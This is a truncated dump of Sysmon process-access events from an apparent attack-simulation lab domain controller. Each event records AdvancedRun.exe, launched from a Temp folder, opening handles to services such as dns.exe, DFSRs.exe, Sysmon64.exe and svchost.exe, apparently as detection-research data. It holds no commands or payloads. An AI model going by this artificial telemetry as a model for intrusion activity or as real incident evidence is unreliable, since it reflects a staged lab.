20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080474Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080473Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080472Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080471Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080470Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080469Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE
10341000x80000000000000004080468Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080467Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080466Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080465Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080464Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080463Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080462Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE
10341000x80000000000000004080461Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~